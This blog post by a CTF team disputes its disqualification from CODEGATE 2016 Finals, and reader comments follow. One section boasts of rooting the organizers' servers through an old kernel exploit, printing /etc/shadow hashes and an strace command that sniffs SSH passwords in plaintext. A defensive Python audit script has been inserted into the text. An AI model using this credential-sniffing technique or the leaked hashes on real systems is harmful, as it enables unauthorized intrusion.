CODEGATEgate

Final scoreboard as captured by l4w.io

Final Scoreboard as captured by manhluat (l4w)

TL;DR

CTF team LC↯BC has been banned and stripped of the first place at CODEGATE CTF 2016 Finals.

The fact was announced after the competition ended, and even after the winners had been announced. The disqualification decision was made in the most unprofessional and biased way possible, and the CTF organizers (Black Perl Security) and CODEGATE have been ignoring our emails since the start of this week, so we are making it public to avoid gossip and speculation.

Also, there are a few technical details.

Timeline

    1. PPP 3570
    2. LC↯BC 3440
    3. 0daysober 2658
30 min before the end of the CTF, we hold second place behind PPP. The distance to first place is a couple of hundred points: we need either of the two remaining challenges to make it to the top.

T−10min. We submit the hulkbox challenge flag to the gameboard and take 1st place.
    1. LC↯BC 3761
    2. PPP 3570
    3. 0daysober 2658

T−9min. The CTF organizers’ team leader starts aggressively demanding that we show him the exploit for the challenge. The task was pwned by one of us who couldn’t make it to Korea and was swapped with someone who could; the guy is asleep in Russia at the moment the flag is submitted (3:50 a.m. in the UTC+3 timezone), so we propose to show the orgs the exploit later once he’s up.

T=. CTF ends, organizers announce the winners. Press begins to interview us.

T+15min. Organizers interrupt the press session and make everyone leave except the teams. It is announced that one of the teams was using remote assistance during the competition. A poll is held on whether remote help is good or bad. “It’s good” 3 : 7 “it’s bad”

T+20min. It’s announced that LC↯BC is disqualified. The scoreboard shifts one row up. We ask why we got disqualified. — Remote assistance. — But it’s not in the rules?? — It’s not in the rules, and you’re disqualified.
    1. PPP 3570
    2. 0daysober 2658
    3. 217 2632

T+30min. Orgas announce the winners: PPP, 0daysober, 217.

T+4days. None of our emails to either CODEGATE or CTF orgas get answered.

Fun bits

CODEGATE 2016 Final Rules

  • The rules don’t mention anything regarding remote players. We will not speculate whether other teams asked their folks who couldn’t come to Seoul for help, but since the voting result was 3 : 7, this rule was not common knowledge. If it is forbidden and important to the point of taking away a team’s result, the rules should state it openly.
  • The orgas’ team leader circled around the PPP table, talking Korean in a low voice throughout the entire game. We know that sounds stupid, but it’s at least amusing. It even made us think the orgas might be biased in their decision when we surpassed PPP. Now that the orgs don’t answer our attempts to communicate, they’re clearly not being cooperative with us.
  • For the last two hours the orgas stared at our displays assertively. Apart from the fact that it’s pretty uncomfortable and breaks your focus when you try to RE, they had more than enough time to tell us if they didn’t like anything about us.
  • Well, we pwned the infrastructure.

    VMs that hosted the services were running this:
    Linux codegate 4.2.0-27-generic #32~14.04.1-Ubuntu SMP Fri Jan 22 15:32:26 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
    which is a quarter-year old kernel vulnerable to this unpopular local privilege escalation strategy (shoutout to halfdog.net).

    We were able to get UID 0 on hackerlife and get a free flag (which we didn’t submit until we had pwned the challenge) as well as /etc/shadow as a trophy.
    codegate:$6$keSuElh.$t/C2mXZj5dKCfOIgGB0WGgP2aq6OwfR/m0PAI1gHAoAqZMwOErpDY7jPHwferwlxd3EFjHeQLdmy5/atDbcGi.:16917:0:99999:7:::
    hackerlife:$6$e9i/0OiN$yGSFlCXUkSaNmZiIY6qe9Ns12fdFJ.xiEiAnsIKa6etN2StNeYIWdqN59RtXvXUI1LRBc9dUw6uzI9NZon7ox1:16922:0:99999:7:::
    hackerlife_pwned:$6$HGrFrh2f$kZp3WZj7T3P6BsH4hLsyQJF8SazU723xt5PTXQRvbxb9M/5i5aBHSFIl6xqgJpsMggbiHH.IvUCsciqShZqvq.:16920:0:99999:7:::

    Some time later the payload challenge was released, running the exact same kernel, so why not try escalating there too?
    codegate:$6$keSuElh.$t/C2mXZj5dKCfOIgGB0WGgP2aq6OwfR/m0PAI1gHAoAqZMwOErpDY7jPHwferwlxd3EFjHeQLdmy5/atDbcGi.:16917:0:99999:7:::
    g0est:$6$zajX8vRv$pFoFz2.0WcgzVxMQrvAAKuXzq2/9h4Gx.Z5w1HLizVFNh58GirRWSvrAtvlSptbueUCoZEbAZSEMrNNdGBYdw/:16923:0:99999:7:::
    payload:$6$JyY8yroK$row2/e4t/cH1y9MGDNNm6Qqv6bpBFedLNuqSt1vRjEk3EtV23cxBHSqjcH6T97D4mmtArLqFfNRAFKXNUMs2P.:16923:0:99999:7:::

    OK, this is interesting. The codegate user has the exact same hash. Let’s attach strace to the SSH server and wait for the password to fly by in plaintext.
    root@codegate:/# strace -ff -p 17809 -e read |& fgrep ', "\f\0\0'
    [pid 17865] read(6, "\f\0\0\0\21qkqojrr******lek!", 22) = 22

    And yeah, it turns out that every game box does have a sudoer codegate account with the exact same password (which is qkqojrr******lek!). Game over!
    After paying a friendly visit to every vulnbox and scoreboard server, we stopped wasting time on this fun “side challenge” and proceeded to play as usual.

    Treat this as a fun piece.
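As an added example (not code from the post or from the organizers), here is the kind of audit that would have caught the reused codegate credential before the game: it parses shadow(5) dumps collected from several hosts and reports every usable hash field that is byte-identical across hosts. The host names and the hash bodies in the sample are constructed.

```python
"""Audit /etc/shadow dumps from several hosts for one shared credential.

In crypt(3) format the second field carries the salt, so two hosts showing
a byte-identical field share both salt and password, which in practice
means a cloned image or a deliberately reused password. Hosts are
identified only by the dict key (assumption: one dump per host).
"""
from collections import defaultdict
from datetime import date, timedelta

# Constructed sample shadow lines (hash bodies are made up, only the field
# layout matters). Three hosts, the `codegate` entry identical on all three.
SAMPLE_HOSTS = {
    "hackerlife": [
        "codegate:$6$keSuElh.$SHAREDHASHBODY0000:16917:0:99999:7:::",
        "hackerlife:$6$e9i/0OiN$LOCALHASHBODYAAAA:16922:0:99999:7:::",
    ],
    "payload": [
        "codegate:$6$keSuElh.$SHAREDHASHBODY0000:16917:0:99999:7:::",
        "payload:$6$JyY8yroK$LOCALHASHBODYBBBB:16923:0:99999:7:::",
        "g0est:*:16923:0:99999:7:::",  # locked, no password login
    ],
    "scoreboard": [
        "codegate:$6$keSuElh.$SHAREDHASHBODY0000:16917:0:99999:7:::",
        "root:!:16900:0:99999:7:::",  # locked
    ],
}


def parse_shadow_line(line):
    """Return (user, hash_field, lastchg_days) from one shadow(5) line."""
    fields = line.rstrip("\n").split(":")
    if len(fields) != 9:
        raise ValueError("not a shadow(5) line: %r" % line)
    lastchg = int(fields[2]) if fields[2] else None
    return fields[0], fields[1], lastchg


def is_usable(hash_field):
    """True if the field can authenticate; '*', '!', '!!' or '' are locked."""
    return bool(hash_field) and not hash_field.startswith(("*", "!"))


def lastchg_date(days):
    """shadow(5) stores the last password change as days since 1970-01-01."""
    return date(1970, 1, 1) + timedelta(days=days)


def find_shared_hashes(hosts):
    """Map each usable hash seen on more than one host to its (host, user) hits.

    Only byte-identical fields match, so a reused password behind different
    salts is NOT detected; that is the check's known blind spot.
    """
    seen = defaultdict(list)
    for host, lines in hosts.items():
        for line in lines:
            user, hash_field, _ = parse_shadow_line(line)
            if is_usable(hash_field):
                seen[hash_field].append((host, user))
    return {h: hits for h, hits in seen.items()
            if len({host for host, _ in hits}) > 1}


if __name__ == "__main__":
    for hash_field, hits in find_shared_hashes(SAMPLE_HOSTS).items():
        print("shared credential %s... on %s" % (hash_field[:12], hits))
```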

Facts

  • LC↯BC had 4 people on-site and 2 remote connected via VPN.
  • The on-site guys played 100% of the CTF time; the remote guys joined and left at their leisure: no one has 20 free hours during a workday.
  • LC↯BC got root privileges on every game server. No attempts were made to destabilize the infrastructure or ruin the fun of the game.
  • Security specialists who organize a CTF with an eight-year history and 55K USD in prizes did:
    • use old Linux kernel version with a public exploit available;
    • use the same password for a sudo user on the entire infrastructure;
    • use passwords to access the servers;
    • spend their time on petty tyranny and annoying players.
  • Our solutions for all the tasks that we have submitted:
    https://www.dropbox.com/sh/oruwb6f7v6p4pdx/AACF0EE82_cfnV-JeMQbDOlea
  • /home/g0est/flag_tlqkf.txt from the payload vulnbox, which we did not submit:
    PAYLOADISNOT_PAYLOADUNLOAD_}

Q & A

Questions related to rules of the competition:

Screenshot of the rules taken during competition

Q: Did LC↯BC submit write-up to CODEGATE organizer after the qualification?
A: Yes

Q: Did LC↯BC join both CODEGATE CTF 2016 and CODEGATE CTF Junior 2016?
A: No

Q: Did LC↯BC share the solution or key of any challenge during the competition?
A: No

Q: Did LC↯BC attack the operating server for everyone :)?
A: No

Q: Was there a rule effective regarding immediately showing your exploit to event organizer?
A: No

Q: Was there a rule effective regarding remote team members?
A: No

General questions

Q: Were there remote players playing for us?
A: Yes

Q: Were we warned before or during the game that remote help can lead to disqualification?
A: No

Q: Have we traded any flags with other teams or organizers?
A: Of course not!

Q: Have we compromised CTF infrastructure (server-side) ?
A: Yes

Q: Did we interfere with infrastructure in any way that ruins CTF gameplay for anyone?
A: No

Q: Did we have the ability to score every single flag available in the competition (incl. Junior CTF) ?
A: Yes

Q: Were all flags submitted to the scoreboard solved by LC↯BC in a proper way?
A: Yes

We hope this conveys our view reasonably and ends any rumors and conjecture about what happened to our team in Seoul this year. We’d like to add that the CODEGATE organizers have been friendly and helpful every year (we have been visiting the event for the 6th year in a row), and we hope to hear their view of the current situation.

The current stance of the orgas really does surprise and irritate us and makes us wonder what to expect from future CODEGATEs.

Guys, please don’t hide. We’re open to discussing it peacefully.

16 comments

  1. Hi guys,

    As a member of another CTF team which follows this case with interest, I would like to thank you for the official statement.

    A few follow-up questions if you don’t mind:

    1. Could you comment also on the general CODEGATE Hacking Competitions rules, stated at http://www.codegate.org/content/page/index.php?id=578?
    Especially point 5 which is:
    “In general competition, there is no limit number of players in qualification. However, more than 4 are not allowed in the finals.”

    2. Since the at-CTF rule set did not mention external players at all (i.e. it neither forbade them, as you point out, nor explicitly allowed them, as was the case e.g. at the DEF CON finals), did you get in touch with the CODEGATE organizers to clarify this?

    Thanks!

    1. Thanks for commenting.

      1. We only looked at the rules on the gameboard during quals and finals — those are the ones on the screenshot. They are different from your link, e.g. breakthrough points are somehow 30, 20, 10, which differs from what was awarded during the game (5, 3, 1). Maybe the ones on codegate.org are from previous years or smth.

      When you play a CTF, you look at the stuff that’s published on the gameboard and on CTFtime. Our bad, I guess, but there’s no way to learn about the other page from the stuff the orgas gave us.

      2. Well yeah, still, as a general principle, everything that is not in the rules is OK to do. Like the rules did not mention using qira or googling during the contest.

      1. Thank you for replying vos!

        Personally I would argue that unknown rules are unknown, i.e. not necessarily “allowed”, though for some cases (i.e. qira or googling, which you’ve mentioned) there is a safe-to-assume default. I’m not convinced that “external players allowed” would safely default to “yes” on a limited-number-of-people-on-site final CTF, but that’s just my personal opinion.

        Kind regards,

          • Dor1s on May 7, 2016 at 14:51

          I wouldn’t say that the default answer on allowing external players is “No” either, since not every CTF has that rule (at least because it is hard to control if Internet access is provided). DEF CON CTF organizers, for example, even clearly say that they don’t care how many people are playing; the only restriction is <= 8 at the table.

          Obviously we wouldn’t have said that the task had been solved remotely if we weren’t 100% sure that it is not prohibited.

  2. Here are my thoughts about rules and building rules.

    There are two aspects to the orgas reaction.

    First: they banned a team for something that’s not in the rules.

    The rules don’t forbid using help from people who didn’t come to the finals. A ruleset creates expectations for the players: when the rules are bent by organizers, players don’t know what to expect (see RWTH CTF for a different issue but the same rule management).

    There was no written rule. Since the voting turned out 3 : 7, the rule was also not obvious as common knowledge, so if the thing is prohibited — the organizers absolutely have to write that down.

    Sometimes it happens that rules have a mistake. Nobody is safe. Such mistakes need to be fixed obligatorily — before the next event. Even in real life, where erroneous laws can be a catastrophe, when they fix the laws they always give some time to react to the changed rule. The law does not apply retroactively.

    There’s also this part of the argument about whether it’s fine to use external help. As for my opinion, I think LegitBS does it well: they say 8 persons at the table and we can’t control how many of you are in the cloud.

    In theory, you can set a rule about number of people involved, but it’s really hard to control and enforce. Also, it’s unclear where the borderline is:

    • own team members VPN into the game network
    • own team members get all the tasks and solve them
    • own team members consult on-site guys over Slack
    • own team members can be asked if you forgot how to do smth
    • google can be asked if you forgot how to do smth
    • internet is disabled

    Such a rule opens a huge ground for subjectivity, and that always sucks big time. That’s why I think they do it right at DEFCON.

    Second aspect is selective usage of the rules.

    At the end of the game, things were going this way: the team submitted a flag, an org asked to show the exploit, the team said that the exploit is remote, the org said the team is banned for using remote help.

    Let’s say we do have a rule established beforehand that prohibits remote backup. We need to enforce it somehow. They do it right on Quals: every team that wants to qualify has to send writeups (saying it once again, the rule is known in advance and teams are ready for it).

    Here the orgs asked only one team to show the exploit code, and when the team could not, that convinced the orgs to ban them. Here we have an open field for subjectivity once again, and it begins to suck: how do we decide whom to ask for an exploit? How do we decide if lack of an exploit means anything bad? The pwner could have furiously rm’ed the sploit once he pwned the task, — or ASLR could have matched luckily.

    Teams expect that solved tasks should be proven by flags, not by stable exploits.

    As one of our guys said, “Capture the Flag” != “Show me the Sploit”.

    A fair application of the rule would be at least to ask for exploits for all the tasks from all the teams. You cannot use the rules to cause inconvenience to some select people. Like in life, the law is the same for everyone.

    • RoMaNSoFt on May 7, 2016 at 18:27

    Sorry to say this (I respect your team, you’re very good at CTFs and your writeups are very nice), but I cannot agree with you this time.

    IMHO, for *onsite* (with *limited* players) CTFs, “remote assistance” is (and has always been considered) *cheating*, I mean, it’s *implicitly* forbidden. No need to have a written rule specifying that, it’s simply very well known (more or less, I think Gynvael tried to state the very same but in a veeeery softer way :-))).

    Defcon CTF is the exception confirming the former rule (they have been ignoring people cheating in this way for years), but at least LegitBS tried to “fix” that situation by “legalizing” it: they’re now *explicitly* allowing remote help and they even explained why: basically because they can neither control nor avoid it (otherwise, I’m pretty sure they would forbid it too).

    That said, I won’t judge your ban, I wasn’t there in Seoul and perhaps I’m missing some other important points. Maybe other teams could have had the same or more remote assistance than you, who knows. Also, perhaps the Org could have warned the teams beforehand instead of being quiet till the end of the contest.

    1. Thanks for your support romansoft, I know you retweet our writeups frequently :) glad you enjoy them.

      What’s your opinion on my large comment above? If you call remote assistance cheating, where on that scale would you draw the line? What do you think about subjectivity / objectivity of such a rule?

      Because clearly, if we try to forbid that, we can’t just ban teams who say they are using it; no one in their right mind would admit it. And since we’re dealing with hackers here, it’s pretty easy to hide.

        • RoMaNSoFt on May 8, 2016 at 01:39

        Obviously, if you don’t get caught cheating (neither admit it!), you (or whoever) cannot be banned :) And I agree with you: it’s something pretty easy to hide. But there’s always a risk to get caught!

        Regarding the borderline, it’s always up to the organizers. For instance, previous Defcon CTF organizers were extremely permissive (basically allowing cheating; they even permitted 30+ ppl teams!!). Others could consider that a very small hint given by your remote buddy (which simply saved you 30 min time) is indeed a reason to ban your team. Etc. Strictly speaking, you are breaking the rule in both cases and you could be banned in both cases too. The only way to be safe for the ban is to fully comply with the rule by playing 100% fair.

        Anyway, the important matter is not where to draw the border line or how difficult it is to get caught: simply *play fair* with the rest of the teams and don’t use remote help at all. Period. If all teams are honest and follow this ethic, there should be no problems/bans at all :)

  3. A small note from outside here.

    Well, probably the remote help could be *implicitly* prohibited, as Roman and Gynvael said, but come on, I’m pretty sure most big (and even small) teams do it.

    At least everybody uses chats (or Slack, or whatever) for collaborating with all team members. Isn’t this a huge remote assistance? Someone can give you a hint which can save hours of pain and lead you to win.
    Even if there is no help, formally discussing tasks with remote members is cheating, right? =) Where’s the borderline, as vos asked?

    Thus, my guess is that PPP used remote help too. 99%. Same about those 3 of 7 teams who voted “It’s good”. So what? Why not check the traffic and disqualify those who violated this implicit rule?

    Orgas didn’t try to investigate or prevent it in any way. IMO you cannot just give everybody an opportunity to “cheat” and *force* afterwards one particular team to admit that.
    The fact that this particular team happened to be the winner makes this even more inappropriate.

    1. We won’t comment on the organizer’s decisions since that’s between LC↯BC and the organizers, and we have a conflict of interest. However, we do want to make it clear that PPP never uses help of any kind from outside teammates during in-person CTFs, unless it is explicitly permitted by the rules (e.g. at recent DEFCON CTFs). During in-person CTFs, we only discuss problems on a private chat channel restricted to the in-person team.

    2. “At least everybody uses chats (or Slack, or whatever) for collaborating with all team members. Isn’t this a huge remote assistance?”

      Whoa, that’s an interesting assumption to make. We (HackingForSoju) always set up private channels with only the people actually on-site and participating, when it’s an on-site final round of a CTF.

      Even in the event that we know that a certain off-site team member could have some useful input (even on a generic “factoid” level) for a certain challenge, we would not ask them for help.

      We have assumed that everyone is doing the same, unless remote players are explicitly allowed. When 3 out of 10 teams at the Codegate finals voted that they think getting assistance from third parties is fine, it really surprised us. It’s really sad to see that it’s apparently not that uncommon to play by a “different set of rules”.

      1. Hm, well, okay, I’ll ask somebody else from big teams about their experience on this issue.
        My team was always too small to have remote assistance (we didn’t even have enough participants for on-site events), so my assumption about the rest may be biased. But I was almost sure of it.

        As for the LC/BC case, I guess this statement was released at all just because the Orgas themselves confirmed and admitted that there was no rule regarding remote help, and the decision about disqualification was made on the fly.

        1. As has already been pointed out, the rule is mentioned here:

          http://www.codegate.org/content/page/index.php?id=578

          Honestly though, this is common knowledge among the CTF teams, especially for a team that has participated in Codegate a number of times before. I don’t read the rules for playing pool every time that I do, and I rarely read the rules before participating in a particular CTF.

          Pwning the CTF infrastructure as well as using remote players in on-site CTFs are both examples of things that are almost always banned, and in the rare case they aren’t it will be clearly stated.

          Regarding Blackperl not mentioning this explicitly on their own rule page (cached version @ https://webcache.googleusercontent.com/search?q=cache:5wStGdQhHQcJ:codegate.bpsec.co.kr/rule), I can somewhat agree that this is an oversight on Blackperl’s side. Although, an oversight comparable to not explicitly having a “no cheating allowed” rule listed (especially since it is actually mentioned in the general Codegate rules).

          What I’m really curious about at the moment is what set of rules MSLC/LCBC/etc have been adhering to during previous years, and especially on the occasions where they have been among the top 3. Also, I’m still really curious about who the remaining two teams that voted “it’s good” were.

    • C on May 8, 2016 at 10:09

    I would consider any help from outside teammates to be cheating unless explicitly permitted. We also use private channels for any in-person CTFs.

    Also, I think you should have been disqualified for getting root on the infrastructure and not reporting it. You have no reason to be running kernel exploits on the organizers machines.

    Personally, I wonder if you cheated for the hulkbox challenge. It seems really unlikely that your teammate sent you the flag and fell asleep immediately after. I wonder if the story is actually that you cheated for the flag and needed time to write an exploit.

    • strike on May 8, 2016 at 10:32

    First off, I don’t like remote players at finals. But this is only a personal opinion as a CTF player. I think there should have been at least these 2 rules.

    1. Remote players are not allowed; since some CTFs don’t block remote players, such as Defcon. Even though many CTF players wouldn’t agree with their rule, Defcon CTF is the most famous one in this category, so it’s not weird that some teams would see other CTFs as following the same rule if one doesn’t mention that it’s not allowed.

    2. Teams can be banned by a poll opened by the staff during the competition or after the competition; this rule looks very strange to me if it happened, and there was no mention of this in the rules.

    • anonymous on May 10, 2016 at 00:18

    It seems you are saying: “our interpretation of the rules is correct. It is the organizers’ fault for having vague rules. We would do the same thing again, given the opportunity.”

    Is this correct?
